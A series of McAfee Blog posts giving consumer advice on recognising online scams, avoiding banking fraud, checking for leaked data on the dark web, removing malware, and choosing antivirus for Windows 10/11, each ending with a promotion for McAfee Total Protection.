Scams are scary, but you can prevent yourself from falling for one by knowing what to look for. Here are a few tell-tale signs that you’re dealing with a scammer.  

They say you’ve won a huge prize

If you get a message that you’ve won a big sum of cash in a sweepstakes you don’t remember entering, it’s a scam. Scammers may tell you that all you need to do to claim your prize is send them a small fee or give them your banking information.  

When you enter a real sweepstakes or lottery, it’s generally up to you to contact the organizer to claim your prize. Sweepstakes aren’t likely to chase you down to give you money.  

They want you to pay in a certain way

Scammers will often ask you to pay them using gift cards, money orders, cryptocurrency (like Bitcoin), or through a particular money transfer service. Scammers need payments in forms that don’t give consumers protection.  

Gift card payments, for example, are typically not reversible and hard to trace. Legitimate organizations will rarely, if ever, ask you to pay using a specific method, especially gift cards.  

When you have to make online payments, it’s a good idea to use a secure service like PayPal. Secure payment systems can have features to keep you safe, like end-to-end encryption.  

They say it’s an emergency

Scammers may try to make you panic by saying you owe money to a government agency and you need to pay them immediately to avoid being arrested. Or the criminal might try to tug at your heartstrings by pretending to be a family member in danger who needs money.  

Criminals want you to pay them or give them your information quickly — before you have a chance to think about it. If someone tries to tell you to pay them immediately in a text message, phone call, or email, they’re likely a scammer.  

They say they’re from a government organization or company

Many scammers pretend to be part of government organizations like the Internal Revenue Service (IRS). They’ll claim you owe them money. Criminals can even use technology to make their phone numbers appear legitimate on your caller ID.  

If someone claiming to be part of a government organization contacts you, go to that organization’s official site and find an official support number or email. Contact them to verify the information in the initial message.  

Scammers may also pretend to be businesses, like your utility company. They’ll likely say something to scare you, like your gas will be turned off if you don’t pay them right away. 

The email is littered with grammatical errors

Most legitimate organizations will thoroughly proofread any copy or information they send to consumers. Professional emails are well-written, clear, and error-free. On the other hand, scam emails will likely be full of grammar, spelling, and punctuation errors.  

It might surprise you to know that scammers write sloppy emails on purpose. The idea is that if the reader is attentive enough to spot the grammatical mistakes, they likely won’t fall for the scam.  

8 most common online scams to watch out for

There are certain scams that criminals try repeatedly because they’ve worked on so many people. Here are a few of the most common scams you should watch out for.  

Phishing scams

A phishing scam can be a phone or email scam. The criminal sends a message in which they pretend to represent an organization you know. It directs you to a fraud website that collects your sensitive information, like your passwords, Social Security number (SSN), and bank account data. Once the scammer has your personal information, they can use it for personal gain.  

Phishing emails may try anything to get you to click on their fake link. They might claim to be your bank and ask you to log into your account to verify some suspicious activity. Or they could pretend to be a sweepstakes and say you need to fill out a form to claim a large reward.  

During the coronavirus pandemic, new phishing scams have emerged, with scammers claiming to be part of various charities and nonprofits. Sites like Charity Navigator can help you discern real groups from fake ones.  

Travel insurance scams

These scams also became much more prominent during the pandemic. Let’s say you’re preparing to fly to Paris with your family. A scammer sends you a message offering you an insurance policy on any travel plans you might be making. They’ll claim the policy will compensate you if your travel plans fall through for any reason without any extra charges.  

You think it might be a good idea to purchase this type of insurance. Right before leaving for your trip, you have to cancel your plans. You go to collect your insurance money only to realize the insurance company doesn’t exist.  

Real travel insurance from a licensed business generally won’t cover foreseeable events (like travel advisories, government turmoil, or pandemics) unless you buy a Cancel for Any Reason (CFAR) addendum for your policy.  

Grandparent scams

Grandparent scams prey on your instinct to protect your family. The scammer will call or send an email pretending to be a family member in some sort of emergency who needs you to wire them money. The scammer may beg you to act right away and avoid sharing their situation with any other family members. 

For example, the scammer might call and say they’re your grandchild who’s been arrested in Mexico and needs money to pay bail. They’ll say they’re in danger and need you to send funds now to save them.  

If you get a call or an email from an alleged family member requesting money, take the time to make sure they’re actually who they say they are. Never wire transfer money right away or over the phone. Ask them a question that only the family member would know and verify their story with the rest of your family.  

Advance fee scam

You get an email from a prince. They’ve recently inherited a huge fortune from a member of their royal family. Now, the prince needs to keep their money in an American bank account to keep it safe. If you let them store their money in your bank account, you’ll be handsomely rewarded. You just need to send them a small fee to get the money.  

There are several versions of this scam, but the prince iteration is a pretty common one. If you get these types of emails, don’t respond or give out your financial information.  

Tech support scams

Your online experience is rudely interrupted when a pop-up appears telling you there’s a huge virus on your computer. You need to “act fast” and contact the support phone number on the screen. If you don’t, all of your important data will be erased.  

When you call the number, a fake tech support worker asks you for remote access to your device to “fix” the problem. If you give the scammer access to your device, they may steal your personal and financial information or install malware. Worse yet, they’ll probably charge you for it.  

These scams can be pretty elaborate. A scam pop-up may even appear to be from a reputable software company. If you see this type of pop-up, don’t respond to it. Instead, try restarting or turning off your device. If the device doesn’t start back up, search for the support number for the device manufacturer and contact them directly.  

Formjacking and retail scams

Scammers will often pose as popular e-commerce companies by creating fake websites. The fake webpages might offer huge deals on social media. They’ll also likely have a URL close to the real business’s URL but slightly different. 

Sometimes, a criminal is skilled enough to hack the website of a large online retailer. When a scammer infiltrates a retailer’s website, they can redirect where the links on that site lead. This is called formjacking.  

For example, you might go to an e-commerce store to buy a jacket. You find the jacket and put it in your online shopping cart. You click “check out,” and you’re taken to a form that collects your credit card information. What you don’t know is that the checkout form is fake. Your credit card number is going directly to the scammers.  

Whenever you’re redirected from a website to make a payment or enter in information, always check the URL. If the form is legitimate, it will have the same URL as the site you were on. A fake form will have a URL that’s close to but not exactly the same as the original site. 

Scareware scams (fake antivirus)

These scams are similar to tech support scams. However, instead of urging you to speak directly with a fake tech support person, their goal is to get you to download a fake antivirus software product (scareware).  

You’ll see a pop-up that says your computer has a virus, malware, or some other problem. The only way to get rid of the problem is to install the security software the pop-up links to. You think you’re downloading antivirus software that will save your computer.  

What you’re actually downloading is malicious software. There are several types of malware. The program might be ransomware that locks up your information until you pay the scammers or spyware that tracks your online activity.  

To avoid this scam, never download antivirus software from a pop-up. You’ll be much better off visiting the website of a reputable company, like McAfee, to download antivirus software.  

Credit repair scams

Dealing with credit card debt can be extremely stressful. Scammers know this and try to capitalize off it. They’ll send emails posing as credit experts and tell you they can help you fix your credit or relieve some of your debt. They might even claim they can hide harmful details on your credit report. 

All you have to do is pay a small fee. Of course, after you pay the fee, the “credit expert” disappears without helping you out with your credit at all. Generally, legitimate debt settlement firms won’t charge you upfront. If a credit relief company charges you a fee upfront, that’s a red flag.  

Before you enter into an agreement with any credit service, check out their reputation. Do an online search on the company to see what you can find. If there’s nothing about the credit repair company online, it’s probably fake.  

What can you do if you get scammed online?

Admitting that you’ve fallen for an online scam can be embarrassing. But reporting a scammer can help stop them from taking advantage of anyone else. If you’ve been the victim of an online scam, try contacting your local police department and filing a report with the Federal Trade Commission (FTC).  

Several other law enforcement organizations handle different types of fraud. Here are a few examples of institutions that can help you report scams.  

• The National Center for Disaster Fraud (NCDS) handles fake scams involving natural disasters and other national crises.  
• The Internet Crime Complaint Center (IC3) handles scams involving malware, fake websites, and fraudulent emails. 
• You can report international scams through econsumer.gov. 
• You can report Social Security scams through the Office of the Inspector General website.  
• You can report scammers who pretend to be the IRS through the Treasury Inspector General for Tax Administration website.  
• You can report tax-related identity fraud to the IRS. 

Discover how McAfee can keep you and your info safe online

Fraudsters shouldn’t stop you from enjoying your time online. Just by learning to spot an online scam, you can greatly strengthen your immunity to cybercrimes.  

For an even greater internet experience, you’ll want the right tools to protect yourself online. McAfee’s Total Protection services can help you confidently surf the web by providing all-in-one protection for your personal info and privacy. This includes identity protection — which comes with 24/7 monitoring of your email addresses and bank accounts — and antivirus software to help safeguard your internet connection.  

Get the peace of mind that comes with McAfee having your back. 

The post How to Recognize an Online Scammer appeared first on McAfee Blog.

Types of Online Banking Scams and How to Avoid Them

Online banking puts the ability to pay bills, check your balance, or transfer money at your fingertips. Unfortunately, it can also make you vulnerable to scammers who may try to trick you into giving them access to your account.  

By remaining vigilant, though, you can avoid common scams. This article discusses mobile banking scams and how to avoid them. 

Most common online banking scams

Online banking can be super convenient — for both you and cybercriminals. And hackers may use a variety of tactics to gain access to your accounts. Most of these involve tricking you into giving them your account information. 

Phishing scams

With this type of online scam, fraudsters may send a text message or email that looks like it’s from your bank. Often, the message will ask for immediate action, such as confirming your information to keep the account from being closed.  

The message might even include a link to the bank, but it actually goes to a fraudulent website designed to look like the bank’s website. When you enter your account information, the scammers record it. 

Sometimes, the email asks you to call a fake customer service number. If you do, you’ll speak to someone who tries to get you to give over sensitive information, like your date of birth or Social Security number (SSN). 

Occasionally, scammers already have some of your personal information. To gain your trust, they might mention personal details like your date of birth or the last four digits of your SSN. They may have learned this information from your social media posts or accessed it in a data breach. 

Cracking passwords

Another way hackers may try to access your bank account is to steal or guess your password. If they can log into your account, they can use your sensitive information for personal gain, otherwise known as identity theft. They can then open credit card accounts in your name, purchase merchandise, or transfer money out of your account. 

Cybercriminals use technology to guess billions of passwords per second. However, it’s more difficult to guess long passwords with a combination of letters and numbers.  

For example, a computer can instantly guess a password consisting of eight letters. Adding one uppercase letter extends the time it takes to crack a password to 22 minutes. In contrast, a 12-character password with an uppercase letter, a number, and a symbol would take the computer 34,000 years to crack. 

Computer viruses

When you click a link or attachment in an email or download fake antivirus software, your device can become infected with malicious software or malware. A virus can let hackers view data from your device and use it to access your financial information or bank accounts.  

Consider getting antivirus software to help protect your devices, like what’s offered through McAfee Total Protection. Our award-winning antivirus software provides 24/7 real-time threat protection against online threats like malware, viruses, ransomware, and phishing, across Apple and Android systems. 

Targeting computers on public Wi-Fi networks

Public Wi-Fi gives you convenient, free access to the internet in restaurants, airports, and department stores. But it can also be easy for hackers to see your private information on an open network that doesn’t require a password.  

If you log into your online bank account, your login information could be exposed, making you vulnerable to bank fraud. Shopping online with public Wi-Fi could also expose your credit card information. 

How to avoid online banking scams

Fortunately, you can protect yourself from cybercriminals with sensible precautions and a healthy dose of suspicion. Use the tips below to help safeguard your accounts from online banking scams. 

Secure your devices with McAfee

McAfee Total Protection provides all-in-one protection for your personal information and privacy. You’ll have coverage for all of your laptops, tablets, and smartphones on most operating systems — Windows, macOS, Android, or iOS. In addition to premium antivirus software, you get identity monitoring and a secure VPN that shields your data when using public Wi-Fi. 

Carefully assess any messages claiming to be your bank

You can better recognize phishing emails once you understand how banks communicate with customers. There are certain things legitimate banks never do. If you get a message like that, assume it’s fraudulent. Some other tips include: 

• Calling: Banks or other financial institutions don’t call for your PIN or checking account number. Never provide this over the phone. Call your bank directly using the phone number on your credit card or bank statement if you want to confirm. 
• Email: Your bank has no reason to email you for account information it already has. If you receive an email asking you to click a link or provide account information, assume it’s fraudulent. Don’t click any links and mark the email as spam. 
• Text messages: If a message appears to be from your bank asking you to sign in or enter your PIN, it’s a scam. Banks never ask customers for this information by text. 
• Urgent action: A common theme in phishing emails is the urgent call to action. Cybercriminals want to scare you into acting immediately without thinking. The email says there was suspicious activity on your account, and you should log in immediately to avoid having it frozen or closed. No legitimate business would close a customer’s account without giving reasonable notice. Contact your bank through your normal channels to check your balance and account activity if you aren’t sure. 
• Typos: Misspelled words and grammatical errors are another red flag. Major corporations have professional editors to make sure the content is correct. 

Create strong passwords and update them regularly

At some point, almost everyone has used the same password for different websites. But this is one of the simplest ways for hackers to get into your accounts. If they figure out the password for one, they can sometimes access your other accounts.  

The most common passwords are:  

• QWERTY 
• Password  
• 12345678 

Use unique passwords for each website. They should be 12 characters long and include numbers, lowercase letters, uppercase letters, and symbols. McAfee Total Protection includes a password manager to help generate and store your passwords in a single location. 

Always make sure you’re on the bank’s official website/app

If you get an email about an issue with your bank account, you can always go directly to your bank’s website. Don’t click any links in a text or email — just go directly to your bank’s website to check your account. Similarly, if you get a phone call, dial your bank directly using the official telephone number. 

Use two-factor authentication when logging into websites for your financial institutions. You’ll get a one-time code by text or email to use each time you log into your account. 

Be cautious of accessing your bank via public Wi-Fi

When you log onto public Wi-Fi, anyone can see your internet activity. For that reason, you shouldn’t log into your bank account with public Wi-Fi unless you’re using a virtual private network (VPN).  

McAfee Secure VPN protects your privacy by turning on automatically for unsecured networks. Your data is encrypted so it can’t be read by prying eyes. The VPN also keeps your online activity and physical location private and secure from advertisers. 

Check your bank statements regularly

Review your bank statements carefully each month to ensure there are no unauthorized transactions. Contact your bank immediately if you see any payments or withdrawals that you don’t recognize. 

See how McAfee keeps you and your data secure online 

Being vigilant and understanding how scammers work can help you avoid online banking scams. For an additional layer of security, use McAfee Total Protection. Our comprehensive cybersecurity services protect all of your devices with award-winning antivirus, a secure VPN for safe Wi-Fi connections, and advanced identity monitoring. There’s even a team of security experts available to assist you around the clock. 

With McAfee, you can bank online with ease knowing your personal data is secure. 

The post Types of Online Banking Scams and How to Avoid Them appeared first on McAfee Blog.

A Guide to Finding Out If Your Information Is on the Dark Web

It’s difficult to imagine what life was like before the internet. We log in daily to pay bills, shop, watch movies, and check out what friends and family are up to on social media. While the internet has made life easier, we may not consider how our online activities can make personal information — such as our Social Security numbers (SSNs) or bank account and credit card numbers — vulnerable to cybercriminals on the dark web.

Fortunately, you can find out if your information is on the dark web and keep tabs on your sensitive information with extensive dark web monitoring, offered through McAfee’s Identity Protection services.  

This article explains what the dark web is, how to find out if personal details have reached the dark web, and how to protect your sensitive information.  

What is the dark web?

Unlike the surface web we use for things like shopping and online banking, the dark web is part of the internet that’s not indexed by search engines. It can only be accessed with special web browsers. A few widely known networks include Tor, I2P, and Riffle.  

Cybercriminals can browse, sell, or trade on dark websites with confidence and complete anonymity. Because of its highly layered encryption system, hackers can communicate without giving away their location, IP address, or identity.  

How does data end up on the dark web?

Data can end up on the dark web in several ways, including through data breaches, using public Wi-Fi, visiting a nonsecure website, and leaving an offline paper trail.  

A cybercriminal may hack into company databases and take personal data, such as email account addresses, passwords, and phone numbers. And while we all love to work at our favorite coffee shop, using an unsecured Wi-Fi network can leave our personal information in public view.  

That’s why using a virtual private network (VPN) like McAfee Secure VPN, which comes with bank-grade encryption to scramble your data, can be a good idea. You’ll also only want to visit encrypted webpages when browsing online — keep an eye out for URLs beginning with HTTPS rather than HTTP. The “S” means added security for you. Lastly, shred paper containing your personal information or lock it away until you can.  

How to find out if your information is on the dark web 

With identity monitoring through McAfee Identity Protection, you’ll receive notifications if we find your personal information on the dark web. Our extensive monitoring service keeps tabs on up to 60 unique types of personal data and can notify you up to 10 months sooner than similar services. Plus, you get peace of mind with up to $1 million of ID theft coverage and hands-on restoration support to help reclaim your identity after identity theft.  

Can you remove your information from the dark web?

While you can’t remove your information once it’s on the dark web, there are plenty of steps you can take to help protect yourself and prevent your data from falling into the wrong hands. You can: 

• Notify the credit bureaus: The three major credit bureaus (Experian, Equifax, and TransUnion) offer options to prevent fraudulent credit requests. If you’re looking to protect your credit data, request an option like two-factor authentication on all credit pulls when notifying the bureaus of your concern. 
• Change your account passwords: Keeping your password secure is crucial to the safety of your online data when it comes to things like online banking and email accounts. Stay away from personal names, dates, or obvious preferences when creating or updating your passwords and use a password manager like McAfee True Key, which auto-saves and enters your passwords.  
• Review your credit report: Staying up to date with the changes reflected on your credit report can help you identify suspicious activity or fraud alerts. Unexpected drops in your credit can be a sign of potential illegal activity. 
• Track credit card statement charges: Credit cards are a large target for hackers looking to commit a cybercrime. Thankfully, there are ways to keep your credit card data secure, starting with regular reviews of your statements to ensure no unexpected charges or usage.  
• Scan your online devices for viruses: Keeping your device free of viruses can help prevent hackers from taking your information in the first place. Start by downloading antivirus software, like what’s included in McAfee Total Protection, to prevent opportunities for viruses to infect your device or collect your secure data.  

6 tips to prevent your data from getting on the dark web

No one wants their information to end up on the dark web. Fortunately, you can do a few things to minimize your risk of exposure. Here are some tips you can use to keep your data safe.  

Secure your data with identity protection software from McAfee

Identity protection software from McAfee can help keep your information out of the hands of cybercriminals. Some features of McAfee identity protection include expert security support, award-winning antivirus protection, a password manager, and firewall protection. Choose the plan that works best for you and keep tabs on your personal information.  

Sign up for two-factor authentication on your devices

This extra layer of security double-checks your identity when signing into an online account. You enter your password as usual and a unique six-digit, one-time code is sent to a trusted device via text. This added step can help improve the security of your personal information.  

Use a unique password for each account

When creating or updating your account passwords, make sure to choose ones that are difficult to guess. Avoid using a pet’s name, your name, or other personal information that others can guess. It goes without saying, but don’t share any of your passwords. 

Consider what you share on social media

Shared content can tell a lot about someone. Have you ever shared the make and model of your first car, your favorite movie or band, or your high school graduation year? This information helps unsavory characters figure out online passwords and security questions. 

Change permission settings for app 

There are a lot of cool apps out there, and many are harmless. However, some may request access to your location, photos, contact list, and even microphone. Certain apps, especially those filled with malware, can then collect your data and share it with others. Fortunately, Android devices and Apple iPhones allow you to change your permission settings for apps. 

Use caution with suspicious emails

With so many emails arriving in our inboxes, we may not always pay close attention to what we’re opening. However, scammers may use phishing emails in an attempt to access your personal information. Sometimes, these emails are obvious, but they can also look legit and appear as a trusted company, such as your bank or credit card company. If something seems amiss, such as a billing error or an invoice, log in through the company’s website rather than click links inside the email.  

Discover how McAfee Total Protection keeps you safe online

No one wants their information on the dark web. Thankfully, there are several things you can do to keep your personal information secure, including all-in-one protection from McAfee. 

McAfee Total Protection comes with advanced identity monitoring, which provides faster and broader detection for your identity, plus premium antivirus software, safe browsing, and Secure VPN.  

With easy setup and extensive monitoring, you can maintain your digital identity and gain peace of mind.  

The post A Guide to Finding Out If Your Information Is on the Dark Web appeared first on McAfee Blog.

How to Quickly Remove Malware in 2022

If you’re like most people, you probably use your computer for most of your online activities. It’s amazing what the internet can do to make our lives easier. But if you’ve spent any time online, you know the internet also comes with some risks. 

Malware (or malicious software) is one risk of living a connected life. Whether it comes from infected websites, innocent-looking email attachments, or applications and tools you think you can trust, malware can expose your private information to cybercriminals who may use it for personal gain. 

If you suspect that malicious software has infected your device, it’s important to remove it quickly to protect yourself.  

Though dealing with malware can be scary, there are a few things you can do. This article will explain how malware can infect devices and how you can remove it from them. 

How devices become infected with malware

There are many types of malware, which do their work in different ways. They can include viruses, worms, Trojans, spyware, adware, ransomware, and more. 

Some common ways that Windows PCs, Macs, tablets, and smartphones can get infected include: 

• Phishing and malspam emails: These are emails — often posing as trusted sources — that try to trick you into revealing sensitive information, such as your credit card number and passwords, to different services. 
• Peer-to-peer sharing (P2P sharing) and torrents: P2P sharing and torrents often offer software, games, and media for illegal downloading. They can also contain downloads spiked with malicious software code. 
• Spoofed websites of well-known brands and organizations: Cybercriminals might pose as websites of legitimate organizations to trick you into downloading malware. Click on a link, and the malware downloads to your hard drive. 
• External storage devices, such as USB drives: USB drives and other external storage devices are a popular way to exchange files between computers. However, if you find or receive a USB drive from an unknown source, don’t plug it into your machine. 
• Compromised software: Sometimes, malware can compromise the software you download. It’s a good idea to only download through trusted sources. 
• Adware, including pop-up ads: Pop-up ads are a nuisance when you click on a webpage, but they can also be laced with malware that’s released when you click on them. 
• Fake mobile apps: These often pose as popular apps, such as fitness tracking tools or cryptocurrency applications. Download them, and your mobile device can become compromised. It’s best only to download apps from trusted sources.  

How can malware affect you?

Malware can affect you in a variety of ways. For example, malware can allow hackers to steal your private information, uncover passwords, cause financial issues for you or your company, delete files, and render your device unusable.  

Malware can also move from your computer to other devices, so you may unwittingly infect friends, family, or co-workers. It can gobble up your computer’s memory, slow its operation to a snail’s pace, and more. 

For these reasons, it’s a good idea to find out how to remove malware and learn to protect yourself from it in the first place. 

Signs malware  is infecting your device

The Federal Trade Commission (FTC) Consumer Information points out some ways to know if malware has infected your device, including if it: 

• Suddenly slows down, crashes, or displays repeated error messages 
• Won’t shut down or restart 
• Prevents you from removing software 
• Starts serving up a lot of pop-up ads, inappropriate ads, or ads that interfere with page content 
• Displays ads in places you wouldn’t usually see them, such as government websites 
• Displays unexpected toolbars or icons in your web browser, such as Chrome or Safari  
• Changes your default search engine or displays new tabs or websites you didn’t open 
• Repeatedly changes your homepage 
• Sends emails from your personal account that you didn’t write 
• Runs out of battery life more quickly than normal 

Malware removal on your PC

How to remove malware from your devices

If you think your computer, smartphone or tablet has been infected by malware, the first step is to stop ​​shopping, banking, and doing other things online that involve usernames, passwords, or other sensitive information until you have the problem resolved. 

If you don’t have an antivirus program on your device, it’s a good idea to get one. McAfee’s antivirus software provides award-winning protection for your data and devices. It’s important to get antivirus software from a trusted name because some malware can even masquerade as security software. 

It’s also important to make sure that your operating system for your different devices and applications are up to date. Older programs and apps might not have the latest security features — cybercriminals are constantly devising new ways to get people’s information — and outdated software can have a harder time fighting off infection.  

Once your cybersecurity software is in place, you should: 

Scan your device for malware

If you have a PC with Windows 10 or 11, you already benefit from free virus threat protection with Microsoft Windows Defender. Windows Defender, or built-in Microsoft security, compares new files and programs against a database of known malware. It keeps an eye out for signs that an attack is underway, such as the encryption of key files.  

Defender can run in active, passive, and disabled mode. In active mode, it’s the primary antivirus app on the device. This means the program will scan files, remedy any threats, and show detected threats in your organization’s security reports and in the Windows Security app. 

Microsoft Defender will automatically turn off if you have another antivirus app installed and turned on. Microsoft Defender will turn back on automatically if you uninstall the other app. 

In passive mode, Microsoft Defender isn’t used as the primary antivirus app on the device. It’ll scan files and report any threats but it won’t remedy those threats. Finally, Microsoft Windows can’t detect or address threats if it is disabled or uninstalled. 

You can run quick and advanced scans in Windows Security. If you’re worried that a specific file or folder has been compromised, you can also run a manual scan by: 

1. Right-clicking the file or folder in File Explorer 
2. Selecting Scan with Microsoft Defender 

You’ll see the scan results and options for dealing with any potential threats. 

Microsoft Defender is also available to protect Android smartphones from viruses and malware. It can also help against phishing and phishing and scans your Android device automatically to track and identify potentially unwanted, and dangerous, applications on your device. 

Apple users, as well, have built-in antivirus software to help detect and fight off malware. Malware is commonly distributed across macOS systems by being embedded in a harmless-looking app.  

Luckily, settings in Security & Privacy preferences allow you to designate the sources of software installed on your Mac. Just follow these steps: 

1. Choose the Apple menu.  
2. Select “System Preferences.” 
3. Click “Security & Privacy.”  
4. Click “General.” 
5. If the lock at the bottom left is locked, click it to unlock the preferences pane. 
6. Select the software sources from which you’ll allow software to be installed, including the Mac App Store and identified developers who are registered with Apple. 

Apple iPads and iPhones have strong built-in security and privacy protections, so it is up to the user on whether or not they want to install antivirus for additional malware protections. Apple boasts a “walled-garden” approach–meaning that their operating system is closed to outside apps and games not affiliated with their official app store unless you jailbreak the device.

Remember that while cybersecurity features built into devices are a great starting point, they’re not always comprehensive. That’s where antivirus software, like McAfee Total Protection, can help. It offers continuous protection against malware, viruses, phishing, ransomware, and other online threats. It also automatically updates so you don’t need to worry about manual upgrades.  

The security software also includes alerts before you connect to risky websites and offers one-click fixes to help you stay safe online. 

Quarantine or remove any viruses

Antivirus software like McAfee works to block malware from infecting your computer, smartphone, or tablet. If malware somehow does get through, it can act as a powerful malware scanner by searching every file on your device for infections.  

It can troubleshoot, look for vulnerabilities, and compile a list of infected software that can be quarantined (or isolated) to prevent it from doing harm and deleted at the end of the virus scan using removal tools.  

McAfee’s anti-malware software updates its virus database by using an automatic web crawler that scans the internet, identifies online threats like malicious software, and figures out how to delete them. 

McAfee antivirus uses this data to automatically update your device’s protective set-upl, providing strong protection so nothing harmful gets in.  

Besides desktop computers, McAfee provides mobile security for both Android and Apple devices. For example, when you use your iPhone or Android phone on a public Wi-Fi system,  McAfee’s Wi-Fi privacy protection (VPN) in effect turns the public network into a private one, where you can surf safely. Of course, its antivirus app regularly scans for threats and malware while actively blocking them in real time, keeping your mobile devices protected. 

McAfee keeps your device secure

McAfee offers a variety of plans tailored to fit your needs and budget so your computer and other devices — including Android smartphones, Apple iPhones, and various tablets — are protected from malware and other online threats. 

McAfee is a leader in consumer security, and our antivirus software is used on more than 6 million devices. It’s easy to install and use, provides 24/7 real-time threat protection, and comes with a Virus Pledge — a money-back guarantee that it’ll remove all viruses from your protected devices. 

You can get antivirus software as part of McAfee’s Total Protection services. This includes all-in-one protection for your personal info and privacy, with identity restoration assistance and up to $1 million of identity theft coverage for data breaches. You also have access to identity monitoring, safe browsing, and a secure VPN.​ 

With McAfee, you can turn apprehension about malware into the peace of mind that comes from proper protection. 

The post How to Quickly Remove Malware in 2022 appeared first on McAfee Blog.

Does Windows 10 or 11 Need Antivirus Software?

If your PC runs on Windows 10, you’re in very good company. The Microsoft operating system is the most widely used OS in the world. Many Windows 10 users have also been upgraded to Windows 11 through a rollout that began in 2021. Microsoft plans to complete the Windows update by mid-2022.

Unfortunately, its success as a widely used operating system makes Windows attractive to hackers. And if malicious software like malware can make a home in Windows, there are a lot of targets. So, this might raise the question of how best to protect your Windows 10 or 11 device.  

 Should you just use Windows Defender — Microsoft’s free version of antivirus software — or buy additional protection?  

Read on to learn what Microsoft Defender covers and how additional virus protection can secure all of your connected devices. 

Does Windows 10 come with antivirus software?

For years, Microsoft has offered anti-malware protection, but the current version provides effective security against viruses. Windows Defender is a free antivirus tool that’s built into the Windows operating system.  

While it’s considered one of the best free antivirus software programs, it doesn’t have any extra features that might come with paid security software. If you’re just looking for good antivirus software, though, Windows Defender can get the job done.  

How to check if Windows Defender is on

If you’re not using third-party antivirus protection, you’ll want to make sure that your Windows Defender antivirus coverage is working on your computer. Here’s how to check: 

1. Go to the control panel and click System and Security. 
2. Click Windows Defender Firewall. 
3. A window will open showing if the firewall is on. 
4. If you need to turn on Windows Defender, use the menu. 
5. Close all browser windows and restart your computer. 

To make sure your Windows security is running, follow these steps: 

1. Click CTRL+Alt+Del and select Task Manager. 
2. Look at the tabs and click Services. 
3. Scroll down to Windows Defender and see if it is classified as “running.” 

Do you need additional antivirus software?

With built-in coverage, you may wonder if you should invest in paid antivirus software. The answer is, of course, yes! It can be a good idea to get another antivirus solution because blocking malware and viruses should just be one part of your threat protection.  

Today’s cybercriminals are using elaborate ruses to try to access your personal information, such as your bank and credit card numbers. And some of their scams might even target your devices with risky apps or links on social media.  

As they always say, it’s better to be safe than sorry! Having another antivirus program can make sure you have real-time protection and access to the latest security features. 

4 features you want in an antivirus software

There are a lot of antivirus protection programs out there, but they aren’t all created equal. When looking for the best antivirus software for your needs, here are some things to consider for your devices running on Windows 10 or 11. 

Compatibility across multiple operating systems

If you have a Windows PC, use an iPhone, and your tablet runs on Chrome, it helps to have an antivirus app that works across multiple operating systems. The good news is that McAfee Total Protection is compatible with Windows, Mac, iOS, and Android devices, so you can continue enjoying all of your different devices without losing protection. 

Protection against a variety of online threats

For greater cybersecurity, antivirus software should defend against a variety of online threats like viruses, spyware, and ransomware. And that’s exactly what you get with McAfee Total Protection. Our antivirus software can also help you avoid phishing attacks, which are fake messages to trick you into providing information or clicking a malicious link. The software will give you a warning when it recognizes a risky link, website, or file. 

Easy to use

Functionality is another thing you’ll want to consider when looking for antivirus software. If the program isn’t easy to use to begin with — especially if you want to easily manage multiple devices — what good will it do you?  

But you don’t have to worry with McAfee Total Protection, which allows you to connect and manage all of your computers and mobile devices from one single dashboard. 

Real-time and scheduled scanning

To keep your devices free from online threats like malware, good antivirus software will scan your files for threats. McAfee Total Protection provides 24/7 protection with real-time, on-demand, and scheduled scanning of files and applications.  

Additional features beyond antivirus software

McAfee Total Protection was developed with an understanding of how cybercriminals operate. Scammers may use a variety of tactics to try to steal your personal information, so our all-in-one protection also includes:  

1. VPN: A virtual private network (VPN) is one of the biggest benefits of using third-party antivirus protection. When you connect to public Wi-Fi, such as in a coffee shop, it’s possible for a hacker to see your data. A VPN encrypts your data to protect it from prying eyes. It also conceals your device’s IP address and geolocation. 
2. Identity monitoring: Get 24/7 monitoring of your email addresses and bank accounts with up to $1 million of ID theft coverage with McAfee Total Protection. With early detection, an easy setup, and extensive monitoring (keeping tabs on up to 60 unique types of personal information), you can continue to live your best life online.  
3. Protection score: We’ll look at the health of your online protection and give you a protection score. We’ll also recommend how to address weak spots and improve your security. 
4. PC optimization: There’s nothing more frustrating than trying to work on a computer that loads pages slowly or keeps freezing. To help speed up your online activities, McAfee  PC Optimizer automatically pauses auto-play on pop-up videos. This gives you more bandwidth and saves battery power. The software also disposes of temporary files and cookies to free disk space. 
5. Password manager: One good way to keep your data secure is to use strong passwords that are unique for each website. Our password manager generates complex passwords, stores them, and even lets you access shared passwords on your mobile devices. 

Personalized protection for your digital life

Using Microsoft’s built-in antivirus software can protect your Windows devices from viruses and malware. But to really keep your network and all of your devices secure, it’s good to rely on comprehensive protection like McAfee Total Protection. With services like identity monitoring, safe browsing, and a secure VPN, you can enjoy the internet without worry. 

The post Does Windows 10 or 11 Need Antivirus Software? appeared first on McAfee Blog.